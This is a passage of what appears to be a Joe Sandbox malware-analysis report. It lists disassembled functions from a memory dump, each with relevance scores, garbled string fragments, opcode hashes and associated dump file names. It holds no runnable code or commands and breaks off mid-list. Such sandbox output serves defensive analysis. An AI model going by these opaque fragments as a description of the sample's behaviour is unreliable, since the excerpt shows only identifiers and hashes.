Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: <#X$HI?_$w&JW$]'
API String ID: 0-3506992731
Opcode ID: fc3a064b6eba5fe12ac947fd9ba0c99dda6d8efd4b3c77d83797a104ad838ae7
Instruction ID: db8979b6844f858b32d4918dbc56cb0536f30e2922361f5f096d910a0a6f147e
Opcode Fuzzy Hash: fc3a064b6eba5fe12ac947fd9ba0c99dda6d8efd4b3c77d83797a104ad838ae7
Instruction Fuzzy Hash: 6CB205F3A0C2049FE304AE2DEC8567ABBE5EF94720F16893DE6C4C7344E63598458697

Function 00D661C3 Relevance: 5.6, Strings: 4, Instructions: 585COMMON

Download Yara Rule

Strings

", xrefs: 00D66776
N, xrefs: 00D6690C
v, xrefs: 00D66599
_, xrefs: 00D667B9

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: "$N$_$v
API String ID: 0-3196990088
Opcode ID: 02060e9d7bd50cb19a178bbcbb7ee1c276137293499f0db37b783eeebcda3d0b
Instruction ID: 38b5f74dde89ed932dc9443ddd3298d8a6218eba519eda6e38b30b9591e96216
Opcode Fuzzy Hash: 02060e9d7bd50cb19a178bbcbb7ee1c276137293499f0db37b783eeebcda3d0b
Instruction Fuzzy Hash: C4127CA3F2156507F7540878CD193A29A8297A1324F2F82788E6CEB7C6D8BEDD4943D4

Function 00C780B0 Relevance: 5.4, Strings: 4, Instructions: 440COMMON

Download Yara Rule

Strings

12, xrefs: 00C783B8
i>}0, xrefs: 00C783AC
-., xrefs: 00C78576
'|, xrefs: 00C78275

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: '|$-.$12$i>}0
API String ID: 0-2215797287
Opcode ID: b0f5fd6a44b8bd67c10b8d1deb7ac73ae9c49f0a21e0bb4b01d458479ca85600
Instruction ID: 864cc3bb45b4f58ec7b3fb3265398d2924987eea1d2b13decfff11ee9b6ccf5a
Opcode Fuzzy Hash: b0f5fd6a44b8bd67c10b8d1deb7ac73ae9c49f0a21e0bb4b01d458479ca85600
Instruction Fuzzy Hash: DBD1FF7220C3118FD718CF28D89179FB7E2EFC1314F05892DE5A98B291EB74950ACB92

Function 00D662CE Relevance: 5.4, Strings: 4, Instructions: 425COMMON

Download Yara Rule

Strings

", xrefs: 00D66776
N, xrefs: 00D6690C
v, xrefs: 00D66599
_, xrefs: 00D667B9

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: "$N$_$v
API String ID: 0-3196990088
Opcode ID: dd1141566bef5d47434849a00b9e1a4064383d71640f4220cc46f7e6b130335e
Instruction ID: 42da1be7f9e60c234db3e5de935e36544cc04ba440292301cf1931db6b8ebfad
Opcode Fuzzy Hash: dd1141566bef5d47434849a00b9e1a4064383d71640f4220cc46f7e6b130335e
Instruction Fuzzy Hash: 34E17CA3F2156507F7650878CD093A29A8297A1324F1F8279CE6CEB7C6D8BEDD4843D4

Function 00C8A3F0 Relevance: 3.2, Strings: 2, Instructions: 711COMMON

Download Yara Rule

Strings

cba`, xrefs: 00C8A429
f, xrefs: 00C8A671

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: cba`$f
API String ID: 2994545307-1109690103
Opcode ID: 57a349b25179ceef353a9af13aaf258dc4980c00b128270864e3c41f658e630f
Instruction ID: 13af5ef9367a6306d248181260834f729e3784ccf8dd2507b539bfc5e068a885
Opcode Fuzzy Hash: 57a349b25179ceef353a9af13aaf258dc4980c00b128270864e3c41f658e630f
Instruction Fuzzy Hash: 8B2205716083419FE314DF28C88072EBBE2EBD5308F19852EE4A6873A6D775DA05CB57

Function 00D163A6 Relevance: 3.1, Strings: 2, Instructions: 565COMMON

Download Yara Rule

Strings

kIw, xrefs: 00D16B7D
&h9j, xrefs: 00D16A0C

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: &h9j$kIw
API String ID: 0-3608247809
Opcode ID: f9b896e17d494bdfe4b7493165f95e402c7acabc2341d9035b54f627655439c8
Instruction ID: 97cf44aa2f30d8f7493b556fa5f2b112eb1121c07f214148bb479c6ba112b087
Opcode Fuzzy Hash: f9b896e17d494bdfe4b7493165f95e402c7acabc2341d9035b54f627655439c8
Instruction Fuzzy Hash: B312DCF3E156204BF3444939DC583A6B696EBD4324F2F823C9E88A7BC5D97E9C094384

Function 00DB40D4 Relevance: 3.0, Strings: 2, Instructions: 506COMMON

Download Yara Rule

Strings

/i}}, xrefs: 00DB473C
AQYf, xrefs: 00DB46A4

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: /i}}$AQYf
API String ID: 0-4225342931
Opcode ID: fc6c3864fa444cd66ba443bcc0ceb2b0b7f27ea8ec2f55561f7601ddbdb4c9f0
Instruction ID: 4092d4950b530026a713421e688611fe1532d2d8adec99080aff4a1effd10013
Opcode Fuzzy Hash: fc6c3864fa444cd66ba443bcc0ceb2b0b7f27ea8ec2f55561f7601ddbdb4c9f0
Instruction Fuzzy Hash: 7002DEF3E146208BF3445D28DC99366BA92EBD4320F2F863D8A9D977C5D97D8C058385

Function 00C72270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON

Download Yara Rule

Strings

TU, xrefs: 00C72296
c!", xrefs: 00C7242F

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: TU$c!"
API String ID: 0-3813282519
Opcode ID: 90440dedbc33159222dbc8f044817bca09fd636a0f9311bd53cbe3eb69c8f3ed
Instruction ID: 7b1cee6a152e75aa25e862a28dab43abe5c23da969708251430af12eab271aac
Opcode Fuzzy Hash: 90440dedbc33159222dbc8f044817bca09fd636a0f9311bd53cbe3eb69c8f3ed
Instruction Fuzzy Hash: AEC136726043008BD714DB29CC9277BB3E6EFD5324F18C52CE99A87392F638EA058756

Function 00CC4473 Relevance: 2.9, Strings: 2, Instructions: 406COMMON

Download Yara Rule

Strings

R4!q, xrefs: 00CC49AB
qu[, xrefs: 00CC46D0

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: R4!q$qu[
API String ID: 0-4165987387
Opcode ID: 8661629661fdc94a0a52ee0789399bdf99623c4f7f23653b522159fa098db9a1
Instruction ID: 5fb809cc97e2bbe9e558ec6a18b39bdbf7e19db7365b89f638d0bb63f07815c9
Opcode Fuzzy Hash: 8661629661fdc94a0a52ee0789399bdf99623c4f7f23653b522159fa098db9a1
Instruction Fuzzy Hash: D6D124F3E142244BF3545E29DC94366B6D6EBE4724F2B823DDE88977C4E93A5C098381

Function 00C54270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00C542EB
IEND, xrefs: 00C54661

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 17a5ceff29e3e2a6d1a31d49b08e2c253a03f602fe64d58fb913762a15367ef2
Instruction ID: 7e7a3b520d1f44db66c9ff66dff1f750849bcf3534f616b45be0a68f53bc6ef9
Opcode Fuzzy Hash: 17a5ceff29e3e2a6d1a31d49b08e2c253a03f602fe64d58fb913762a15367ef2
Instruction Fuzzy Hash: 44D1DCB9908344AFD720CF14D841B5BBBE0AB94309F14492DFD999B382D774E98CCB86

Function 00C6D074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

pr, xrefs: 00C6D112
|~, xrefs: 00C6D10A

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: e82c93150a6d0a17daa00588d0358b6659df6604cb17e822827aa32fa7da79ba
Instruction ID: 83233abb7bcb8602e5b0d8a9d56c2d1c411a75cda5775b5bc5479b4d4a054f56
Opcode Fuzzy Hash: e82c93150a6d0a17daa00588d0358b6659df6604cb17e822827aa32fa7da79ba
Instruction Fuzzy Hash: F8510FB0A0C350CBC7108F24C85276FB7F1EF92315F18856DE8855B3A1E73A9A46CB5A

Function 00C6D087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

pr, xrefs: 00C6D112
|~, xrefs: 00C6D10A

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: 8c2f69c46201cf2b8e6018bfec36103bc1d58d5dd29f8410c805ba667af9f2c9
Instruction ID: 32393c0066a61a2eece65c9c77a92c542c692139f837b217b7d158aee1feacb8
Opcode Fuzzy Hash: 8c2f69c46201cf2b8e6018bfec36103bc1d58d5dd29f8410c805ba667af9f2c9
Instruction Fuzzy Hash: 0A51FFB060C350CBC7109F24C85276FB7F1EF92315F18856DE8855B391E73A8A46DB5A

Function 00C7536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

X, xrefs: 00C7556A
BLJB, xrefs: 00C75554

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: BLJB$X
API String ID: 0-2222927247
Opcode ID: 5103d70d6439fb19cd3a648f47b8a3b6b41c6e6133ffc4d996e4c946e464ee80
Instruction ID: b46037c3d01570cc723fbc91c6efefe9b6b16eabdd8a018ba496b2c5e99f0541
Opcode Fuzzy Hash: 5103d70d6439fb19cd3a648f47b8a3b6b41c6e6133ffc4d996e4c946e464ee80
Instruction Fuzzy Hash: E8517A31618B818BD7308F7884412EBBBE1EF55350F588A3DD8ED87392E2B4D645E382

Function 00DFE101 Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

pJ, xrefs: 00DFE154
t'to, xrefs: 00DFE11E

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: t'to$pJ
API String ID: 0-421950738
Opcode ID: cc69f1cea3aa0b5ee519292c330d2ab994c1ec8f75fe49d1f8827eef254eef6c
Instruction ID: d8e86817d8c2a6c2c176e70a36055c918de64722a34c99edf1380203d7b1fd4e
Opcode Fuzzy Hash: cc69f1cea3aa0b5ee519292c330d2ab994c1ec8f75fe49d1f8827eef254eef6c
Instruction Fuzzy Hash: B3514AB3E181105BF3489A39DD5537A778AEBD4320F2AC63EDA89C73C4EC795C098291

Function 00CA80CB Relevance: 2.6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

]kh0, xrefs: 00CA9E76
V, xrefs: 00CA9173

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
